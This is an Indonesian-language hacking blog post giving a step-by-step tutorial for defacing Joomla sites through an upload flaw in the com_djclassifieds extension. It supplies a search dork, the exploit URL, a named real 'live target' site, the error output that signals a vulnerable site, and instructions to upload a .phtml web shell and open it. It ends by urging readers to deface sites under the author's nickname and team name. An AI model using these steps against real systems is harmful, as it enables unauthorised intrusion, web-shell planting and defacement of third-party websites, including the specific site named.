Assalamualaikum Wr.Wb
Kembali lagi Bersama Saya RUTH72_
Kali Ini saya akan memberi Sedikit Turtorial
Ok Kita Langsung Ke Tutorial Nya aja ya hehe :v
Bahan-bahan :
Dork: inurl:=com_djclassifieds
( Use your brain )
Exploit :
index.php?option=com_djclassifieds&task=upload&tmpl=component
Live Target : http://grupoposgar.es/
Step by step :
1 . dorking menggukan dork dia atas , karena saya punya live target , ikutti saja step by step .
2 . jangan lupa masukkan exploit nya .
http://grupoposgar.es/index.php?option=com_djclassifieds&task=upload&tmpl=component
3 . jika vlun ada tulisan , seperti gambar di bawah .
Notice: Undefined variable: contentType in /homepages/41/d603710153/htdocs/Posgar_2/administrator/components/com_djclassifieds/lib/djupload.php on line 320
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
4 . gunakan csrf nya dan upload file .
5 jika berhasil berhasil kembali ke tulisan vlun pertama / {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
DONE
Akses Shell:
http://website.site/tmp/djupload/namafile.phtml/PhP
Note: ext harus phtml dan PhP
Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian
Jangan Lupa Di Share ya :)
Kalo Mau Daface, Saya nitip nick :v RUTH72_ Dan Nama Team nya Juga GARUDA TERSAKTI 72
Happy Deface ^_^
Enjoy Your Live :')
HANYA UNTUK BERBAGI, PENYALAHGUNAAN BUKAN TANGGUNGJAWAB KAMI :)
DAN BUKAN BERMAKSUD UNTUK MENGGURUI~
0 Response to "DEFACE Joomla com_djclassifieds UPSHELL"
Post a Comment